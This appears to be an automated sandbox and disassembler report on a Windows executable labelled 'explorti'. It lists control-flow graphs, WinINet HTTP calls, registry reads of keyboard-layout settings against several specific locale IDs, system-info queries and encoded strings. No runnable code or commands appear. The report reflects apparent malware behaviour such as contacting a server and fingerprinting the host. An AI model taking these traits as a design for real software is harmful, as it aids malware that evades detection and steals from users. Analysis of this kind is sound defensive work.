GetSystemTimePreciseAsFileTime 14815->14817 14816->14811 14817->14816 14820 a1c1c2 14819->14820 14821 a1c1a4 14819->14821 14820->14820 14821->14820 14823 a1c1c7 14821->14823 14828 a02aa0 14823->14828 14825 a1c1de 14844 a1c12f 14825->14844 14827 a1c1ef std::_Throw_future_error 14827->14821 14850 a1be0f 14828->14850 14830 a02abf 14830->14825 14831 a38aaf __cftof 4 API calls 14832 a36c26 14831->14832 14833 a36c43 14832->14833 14834 a36c35 14832->14834 14836 a368bd 5 API calls 14833->14836 14835 a36c99 11 API calls 14834->14835 14838 a36c3f 14835->14838 14839 a36c5d 14836->14839 14837 a02ab4 __cftof 14837->14830 14837->14831 14838->14825 14840 a3681d RtlAllocateHeap 14839->14840 14841 a36c6a 14840->14841 14842 a36c99 11 API calls 14841->14842 14843 a36c71 ___free_lconv_mon 14841->14843 14842->14843 14843->14825 14845 a1c13b __EH_prolog3_GS 14844->14845 14846 a17f30 RtlAllocateHeap 14845->14846 14847 a1c16d 14846->14847 14857 a02670 14847->14857 14849 a1c182 14849->14827 14853 a1cb61 14850->14853 14854 a1cb6f InitOnceExecuteOnce 14853->14854 14856 a1be22 14853->14856 14854->14856 14856->14837 14858 a17870 RtlAllocateHeap 14857->14858 14859 a026c2 14858->14859 14860 a026e5 14859->14860 14861 a18e70 RtlAllocateHeap 14859->14861 14862 a18e70 RtlAllocateHeap 14860->14862 14864 a0274e shared_ptr 14860->14864 14861->14860 14862->14864 14863 a337dc ___std_exception_copy RtlAllocateHeap 14865 a0280b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr ___std_exception_destroy 14863->14865 14864->14863 14864->14865 14865->14849

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1006 a0bd60-a0bdac 1007 a0c1a1-a0c1c6 call a17f30 1006->1007 1008 a0bdb2-a0bdb6 1006->1008 1014 a0c1f4-a0c20c 1007->1014 1015 a0c1c8-a0c1d4 1007->1015 1008->1007 1009 a0bdbc-a0bdc0 1008->1009 1009->1007 1011 a0bdc6-a0be4f InternetOpenW InternetConnectA call a17870 call a05b20 1009->1011 1038 a0be51 1011->1038 1039 a0be53-a0be6f 1011->1039 1016 a0c212-a0c21e 1014->1016 1017 a0c158-a0c170 1014->1017 1019 a0c1d6-a0c1e4 1015->1019 1020 a0c1ea-a0c1f1 call a1d593 1015->1020 1022 a0c224-a0c232 1016->1022 1023 a0c14e-a0c155 call a1d593 1016->1023 1025 a0c243-a0c25f call a1cf21 1017->1025 1026 a0c176-a0c182 1017->1026 1019->1020 1027 a0c26f-a0c274 call a36b9a 1019->1027 1020->1014 1022->1027 1030 a0c234 1022->1030 1023->1017 1032 a0c188-a0c196 1026->1032 1033 a0c239-a0c240 call a1d593 1026->1033 1030->1023 1032->1027 1040 a0c19c 1032->1040 1033->1025 1038->1039 1045 a0bea0-a0bf0f call a17870 call a05b20 call a17870 call a05b20 1039->1045 1046 a0be71-a0be80 1039->1046 1040->1033 1059 a0bf11 1045->1059 1060 a0bf13-a0bf29 HttpSendRequestA 1045->1060 1048 a0be82-a0be90 1046->1048 1049 a0be96-a0be9d call a1d593 1046->1049 1048->1049 1049->1045 1059->1060 1061 a0bf5a-a0bf82 1060->1061 1062 a0bf2b-a0bf3a 1060->1062 1063 a0bfb3-a0bfd4 InternetReadFile 1061->1063 1064 a0bf84-a0bf93 1061->1064 1065 a0bf50-a0bf57 call a1d593 1062->1065 1066 a0bf3c-a0bf4a 1062->1066 1069 a0bfda 1063->1069 1067 a0bf95-a0bfa3 1064->1067 1068 a0bfa9-a0bfb0 call a1d593 1064->1068 1065->1061 1066->1065 1067->1068 1068->1063 1073 a0bfe0-a0c090 call a34180 1069->1073
                      APIs
                      • InternetOpenW.WININET(00A58D68,00000000,00000000,00000000,00000000), ref: 00A0BDEC
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A0BE11
                      • HttpSendRequestA.WININET(?,00000000), ref: 00A0BF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00A0BFCD
                      • InternetCloseHandle.WININET(?), ref: 00A0C0A7
                      • InternetCloseHandle.WININET(?), ref: 00A0C0AF
                      • InternetCloseHandle.WININET(?), ref: 00A0C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
                      • String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$invalid stoi argument$stoi argument out of range
                      • API String ID: 3632815558-884042532
                      • Opcode ID: 7c6003c44dc366b95cdf095e774aa95410e85f8133989492875bf6a788d7b0fa
                      • Instruction ID: cdb0c4c33af337fc6d190082abbd7cfb5906cbd825da6b5c9acde784aa44e9b9
                      • Opcode Fuzzy Hash: 7c6003c44dc366b95cdf095e774aa95410e85f8133989492875bf6a788d7b0fa
                      • Instruction Fuzzy Hash: 5FB1E4B1A101189BEB28DF28DD84BDEBB75EF45314F5042A9F508972C2D7749AC0CBA4

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1162 a0e440-a0e989 call a17870 call a05b20 call a17870 call a05b20 call a191b0 call a18250 call a18150 call a18250 call a17870 * 3 call a0bd60 call a17870 * 2 call a05b20 call a084b0 1207 a0e9b3-a0e9cd call a1cf21 1162->1207 1208 a0e98b-a0e997 1162->1208 1209 a0e9a9-a0e9b0 call a1d593 1208->1209 1210 a0e999-a0e9a7 1208->1210 1209->1207 1210->1209 1212 a0e9d3-a0eca7 call a36b9a call a17870 call a05b20 call a182f0 call a18150 call a17870 call a05b20 call a182f0 call a18150 1210->1212 1243 a0ecad-a0ed89 1212->1243 1248 a0f183-a0f19b 1243->1248 1249 a0f4cb-a0f57c call a17f30 1243->1249 1251 a0f1a1-a0f1ad 1248->1251 1252 a0f5b3-a0f5c6 1248->1252 1249->1248 1255 a0f5a9-a0f5b0 call a1d593 1249->1255 1254 a0f1b3-a0f1c1 1251->1254 1251->1255 1254->1249 1256 a0f5db-a0f872 call a36b9a call a17870 call a05b20 call a17870 * 4 call a0e440 call a17f30 call a17870 call a17f30 * 2 1254->1256 1255->1252 1291 a0f874-a0f880 1256->1291 1292 a0f89c-a0f8b5 call a1cf21 1256->1292 1293 a0f892-a0f899 call a1d593 1291->1293 1294 a0f882-a0f890 1291->1294 1293->1292 1294->1293 1297 a0f8bb-a0fa25 call a36b9a call a17870 call a05b20 call a17870 * 4 call a0e440 1294->1297 1320 a0fa27-a0fa33 1297->1320 1321 a0fa4f-a0fa5e 1297->1321 1322 a0fa45-a0fa4c call a1d593 1320->1322 1323 a0fa35-a0fa43 1320->1323 1322->1321 1323->1322 1324 a0fa5f-a0fb7f call a36b9a call a17870 call a094b0 call a09160 call a18250 1323->1324 1339 a0fb80-a0fb85 1324->1339 1339->1339 1340 a0fb87-a10770 call a17f30 call a17870 * 2 call a0c280 call a36659 call a17870 call a05b20 call a17870 * 4 call a0e440 1339->1340 1374 a10772-a1077e 1340->1374 1375 a1079a-a107b5 call a1cf21 1340->1375 1376 a10790-a10797 call a1d593 1374->1376 1377 a10780-a1078e 1374->1377 1376->1375 1377->1376 1379 a107de-a1149c call a36b9a call a17870 call a05b20 call a17870 * 4 call a0e440 1377->1379
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$UVy=
                      • API String ID: 0-3836280467
                      • Opcode ID: c1b5fdc5e2ee20f3247851f4fa75da00eca2d4ff6451667bdc220c10ae3acc21
                      • Instruction ID: 14c063d51fda9e5364d874448982214552508b46b3500581175d196038ce12f7
                      • Opcode Fuzzy Hash: c1b5fdc5e2ee20f3247851f4fa75da00eca2d4ff6451667bdc220c10ae3acc21
                      • Instruction Fuzzy Hash: BD82D67090424CDBEF14EF68CA497DE7FB6AB46304F508598E805673C2D7759A88CBD2
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00A0247E
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: 368323c149c7cba687071d1f01ebe96af6df0eb899688c10d111f2b57ccaf414
                      • Instruction ID: d5565e9b960120931f5fce6563ea55daec72fa1a962576dfac2030f415a52b01
                      • Opcode Fuzzy Hash: 368323c149c7cba687071d1f01ebe96af6df0eb899688c10d111f2b57ccaf414
                      • Instruction Fuzzy Hash: 0351CEB2E01A058FDB19CFA8E8957AEB7F0FB18350F24856AD405EB290D3B49D81CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 a13550-a13589 1 a14160-a14166 0->1 2 a1358f-a135df call a17f30 0->2 3 a14194-a141ac 1->3 4 a14168-a14174 1->4 11 a135e5-a1362b call a17f30 2->11 12 a14237 call a18070 2->12 8 a141da-a141f2 3->8 9 a141ae-a141ba 3->9 6 a14176-a14184 4->6 7 a1418a-a14191 call a1d593 4->7 6->7 15 a14273 call a36b9a 6->15 7->3 13 a141f4-a14200 8->13 14 a1421c-a14236 call a1cf21 8->14 17 a141d0-a141d7 call a1d593 9->17 18 a141bc-a141ca 9->18 11->12 32 a13631-a1366f call a17f30 11->32 31 a1423c call a18070 12->31 22 a14212-a14219 call a1d593 13->22 23 a14202-a14210 13->23 17->8 18->15 18->17 22->14 23->15 23->22 36 a14241 call a36b9a 31->36 32->12 40 a13675-a136c0 call a17f30 call a17870 call a05b20 32->40 39 a14246 call a36b9a 36->39 43 a1424b call a18070 39->43 54 a136c2 40->54 55 a136c4-a136f9 call a18ad0 40->55 47 a14250 call a36b9a 43->47 51 a14255 call a36b9a 47->51 56 a1425a-a1425f call a1c0c9 51->56 54->55 55->31 60 a136ff-a1372e call a17f30 55->60 61 a14264 call a36b9a 56->61 66 a13730-a1373f 60->66 67 a1375f-a13784 call a09820 60->67 65 a14269-a1426e call a1c109 61->65 65->15 69 a13741-a1374f 66->69 70 a13755-a1375c call a1d593 66->70 75 a13c68-a13c6e 67->75 76 a1378a-a137f2 call a17870 call a05b20 call a17f30 67->76 69->36 69->70 70->67 77 a13c70-a13c7c 75->77 78 a13c9c-a13ca2 75->78 110 a137f4 76->110 111 a137f6-a1382d call a193a0 76->111 82 a13c92-a13c99 call a1d593 77->82 83 a13c7e-a13c8c 77->83 80 a13cd0-a13cd6 78->80 81 a13ca4-a13cb0 78->81 87 a13d04-a13d1c 80->87 88 a13cd8-a13ce4 80->88 85 a13cb2-a13cc0 81->85 86 a13cc6-a13ccd call a1d593 81->86 82->78 83->61 83->82 85->61 85->86 86->80 96 a13d4d-a13d53 87->96 97 a13d1e-a13d2d 87->97 94 a13ce6-a13cf4 88->94 95 a13cfa-a13d01 call a1d593 88->95 94->61 94->95 95->87 96->1 99 a13d59-a13d65 96->99 102 a13d43-a13d4a call a1d593 97->102 103 a13d2f-a13d3d 97->103 106 a14156-a1415d call a1d593 99->106 107 a13d6b-a13d79 99->107 102->96 103->61 103->102 106->1 107->61 113 a13d7f 107->113 110->111 117 a1385a-a13867 111->117 118 a1382f-a1383a 111->118 113->106 121 a13869-a13878 117->121 122 a13898-a1389f 117->122 119 a13850-a13857 call a1d593 118->119 120 a1383c-a1384a 118->120 119->117 120->39 120->119 126 a1387a-a13888 121->126 127 a1388e-a13895 call a1d593 121->127 123 a13a63-a13a93 call a37443 call a38979 122->123 124 a138a5-a138c7 122->124 123->56 140 a13a99-a13a9c 123->140 124->43 129 a138cd-a138ff call a17f30 call a0aca0 124->129 126->39 126->127 127->122 142 a13901-a13907 129->142 143 a13957-a13960 129->143 140->65 141 a13aa2-a13aa5 140->141 141->75 144 a13aab 141->144 147 a13935-a13954 142->147 148 a13909-a13915 142->148 145 a13991-a139d1 call a17870 * 2 call a04960 143->145 146 a13962-a13971 143->146 149 a13ab2-a13b77 call a17f30 call a17870 call a05b20 call a17870 * 5 144->149 150 a13e52-a13eb4 call a17870 * 4 call a12e20 144->150 151 a13d84-a13e4d call a17f30 call a17870 call a05b20 call a17870 * 5 144->151 152 a13b9d-a13c5d call a17f30 call a17870 call a05b20 call a17870 * 5 call a11dd0 144->152 189 a139d3-a139d9 145->189 190 a13a29-a13a32 145->190 153 a13973-a13981 146->153 154 a13987-a1398e call a1d593 146->154 147->143 156 a13917-a13925 148->156 157 a1392b-a13932 call a1d593 148->157 238 a13b7b-a13b8d call a17870 call a107f0 149->238 150->75 151->238 241 a13c62 152->241 153->47 153->154 154->145 156->47 156->157 157->147 196 a13a07-a13a26 189->196 197 a139db-a139e7 189->197 190->123 193 a13a34-a13a43 190->193 202 a13a45-a13a53 193->202 203 a13a59-a13a60 call a1d593 193->203 196->190 206 a139e9-a139f7 197->206 207 a139fd-a13a04 call a1d593 197->207 202->51 202->203 203->123 206->51 206->207 207->196 244 a13b92-a13b98 238->244 241->75 244->75
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00A1425F
                        • Part of subcall function 00A17870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00A1795C
                        • Part of subcall function 00A17870: __Cnd_destroy_in_situ.LIBCPMT ref: 00A17968
                        • Part of subcall function 00A17870: __Mtx_destroy_in_situ.LIBCPMT ref: 00A17971
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                      • String ID: "$0657d1$246122658369$5120$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$FAml$IEYUMK==$KIG+$KIK+$T4Ve$TZC0$TZS0$Toe0$UIU0$UIrm$UZbf$invalid stoi argument$stoi argument out of range
                      • API String ID: 4234742559-4111701409
                      • Opcode ID: 4e8801b04d98641c005b5e169ba096568068bea77df5f70e767afcd2694be58a
                      • Instruction ID: cfa7446927961892ed433b5e590fdd5eb085dd78e2a793c458c7e913afb2a330
                      • Opcode Fuzzy Hash: 4e8801b04d98641c005b5e169ba096568068bea77df5f70e767afcd2694be58a
                      • Instruction Fuzzy Hash: EC520471A00248DBEF18EF78CD4ABDDBB76AF45300F504198E445A7282DB759AC5CBA2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1411 a05df0-a05eee 1417 a05ef0-a05efc 1411->1417 1418 a05f18-a05f25 call a1cf21 1411->1418 1419 a05f0e-a05f15 call a1d593 1417->1419 1420 a05efe-a05f0c 1417->1420 1419->1418 1420->1419 1422 a05f26-a060ad call a36b9a call a1e080 call a17f30 * 5 RegOpenKeyExA 1420->1422 1440 a060b3-a06143 call a34020 1422->1440 1441 a06478-a06481 1422->1441 1471 a06466-a06472 1440->1471 1472 a06149-a0614d 1440->1472 1442 a06483-a0648e 1441->1442 1443 a064ae-a064b7 1441->1443 1445 a06490-a0649e 1442->1445 1446 a064a4-a064ab call a1d593 1442->1446 1447 a064e4-a064ed 1443->1447 1448 a064b9-a064c4 1443->1448 1445->1446 1452 a0659e-a065a3 call a36b9a 1445->1452 1446->1443 1450 a0651a-a06523 1447->1450 1451 a064ef-a064fa 1447->1451 1454 a064c6-a064d4 1448->1454 1455 a064da-a064e1 call a1d593 1448->1455 1459 a06525-a06530 1450->1459 1460 a0654c-a06555 1450->1460 1456 a06510-a06517 call a1d593 1451->1456 1457 a064fc-a0650a 1451->1457 1454->1452 1454->1455 1455->1447 1456->1450 1457->1452 1457->1456 1466 a06542-a06549 call a1d593 1459->1466 1467 a06532-a06540 1459->1467 1468 a06582-a0659d call a1cf21 1460->1468 1469 a06557-a06566 1460->1469 1466->1460 1467->1452 1467->1466 1478 a06578-a0657f call a1d593 1469->1478 1479 a06568-a06576 1469->1479 1471->1441 1473 a06460 1472->1473 1474 a06153-a06187 RegEnumValueW 1472->1474 1473->1471 1480 a0644d-a06454 1474->1480 1481 a0618d-a061ad 1474->1481 1478->1468 1479->1452 1479->1478 1480->1474 1488 a0645a 1480->1488 1487 a061b0-a061b9 1481->1487 1487->1487 1489 a061bb-a0624d call a17c50 call a18090 call a17870 * 2 call a05c60 1487->1489 1488->1473 1489->1480
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: f6a3a878bed19cc7dd0ca39f3a88a6b3249682ebeb087570e60661aa35625332
                      • Instruction ID: 718b632e8a7cd49fe6ad787c0e0980e32f95b5efadc944ef084884b3ee757ef0
                      • Opcode Fuzzy Hash: f6a3a878bed19cc7dd0ca39f3a88a6b3249682ebeb087570e60661aa35625332
                      • Instruction Fuzzy Hash: C0E17D7190021CABEB28DFA4CD89BDEB7B9AB04304F5042D9E509A7291DB74ABC5CF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1499 a07d00-a07d82 call a34020 1503 a07d88-a07db0 call a17870 call a05b20 1499->1503 1504 a0827e-a0829b call a1cf21 1499->1504 1511 a07db2 1503->1511 1512 a07db4-a07dd6 call a17870 call a05b20 1503->1512 1511->1512 1517 a07dd8 1512->1517 1518 a07dda-a07df3 1512->1518 1517->1518 1521 a07e24-a07e4f 1518->1521 1522 a07df5-a07e04 1518->1522 1525 a07e80-a07ea1 1521->1525 1526 a07e51-a07e60 1521->1526 1523 a07e06-a07e14 1522->1523 1524 a07e1a-a07e21 call a1d593 1522->1524 1523->1524 1527 a0829c call a36b9a 1523->1527 1524->1521 1531 a07ea3-a07ea5 GetNativeSystemInfo 1525->1531 1532 a07ea7-a07eac 1525->1532 1529 a07e62-a07e70 1526->1529 1530 a07e76-a07e7d call a1d593 1526->1530 1540 a082a1-a082a6 call a36b9a 1527->1540 1529->1527 1529->1530 1530->1525 1533 a07ead-a07eb6 1531->1533 1532->1533 1538 a07ed4-a07ed7 1533->1538 1539 a07eb8-a07ebf 1533->1539 1544 a07edd-a07ee6 1538->1544 1545 a0821f-a08222 1538->1545 1542 a07ec5-a07ecf 1539->1542 1543 a08279 1539->1543 1547 a08274 1542->1547 1543->1504 1548 a07ee8-a07ef4 1544->1548 1549 a07ef9-a07efc 1544->1549 1545->1543 1550 a08224-a0822d 1545->1550 1547->1543 1548->1547 1552 a07f02-a07f09 1549->1552 1553 a081fc-a081fe 1549->1553 1554 a08254-a08257 1550->1554 1555 a0822f-a08233 1550->1555 1558 a07fe9-a081e5 call a17870 call a05b20 call a17870 call a05b20 call a05c60 call a17870 call a05b20 call a05640 call a17870 call a05b20 call a17870 call a05b20 call a05c60 call a17870 call a05b20 call a05640 call a17870 call a05b20 call a17870 call a05b20 call a05c60 call a17870 call a05b20 call a05640 1552->1558 1559 a07f0f-a07f6b call a17870 call a05b20 call a17870 call a05b20 call a05c60 1552->1559 1556 a08200-a0820a 1553->1556 1557 a0820c-a0820f 1553->1557 1562 a08265-a08271 1554->1562 1563 a08259-a08263 1554->1563 1560 a08235-a0823a 1555->1560 1561 a08248-a08252 1555->1561 1556->1547 1557->1543 1565 a08211-a0821d 1557->1565 1597 a081eb-a081f4 1558->1597 1584 a07f70-a07f77 1559->1584 1560->1561 1567 a0823c-a08246 1560->1567 1561->1543 1562->1547 1563->1543 1565->1547 1567->1543 1586 a07f79 1584->1586 1587 a07f7b-a07f9b call a38a81 1584->1587 1586->1587 1593 a07fd2-a07fd4 1587->1593 1594 a07f9d-a07fac 1587->1594 1596 a07fda-a07fe4 1593->1596 1593->1597 1599 a07fc2-a07fcf call a1d593 1594->1599 1600 a07fae-a07fbc 1594->1600 1596->1597 1597->1545 1602 a081f6 1597->1602 1599->1593 1600->1540 1600->1599 1602->1553
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A07EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, Offset: 00A00000, based on PE: true
                      • Associated: 00000007.00000002.2895993515.0000000000A00000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896017523.0000000000A62000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896118697.0000000000A69000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000A6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CCA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000CFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D02000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896145299.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896495970.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896648350.0000000000EAA000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2896664715.0000000000EAC000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_a00000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: HlurNa==$HlurOK==$HlusMa==
                      • API String ID: 1721193555-2203186029
                      • Opcode ID: 4069a547dda4f626a5716fceee91c536ee37d1aeaa6fb4da0c67083a80d247ff
                      • Instruction ID: 6e1c815ab1685a330408bce4dfcfe353d98ed244bba66c21c41541ba0fcb0c02
                      • Opcode Fuzzy Hash: 4069a547dda4f626a5716fceee91c536ee37d1aeaa6fb4da0c67083a80d247ff
                      • Instruction Fuzzy Hash: A5D12771E00608ABDF14FB68ED4B39E7B71AB46320F544288E4556B3C2DB795E818BD2

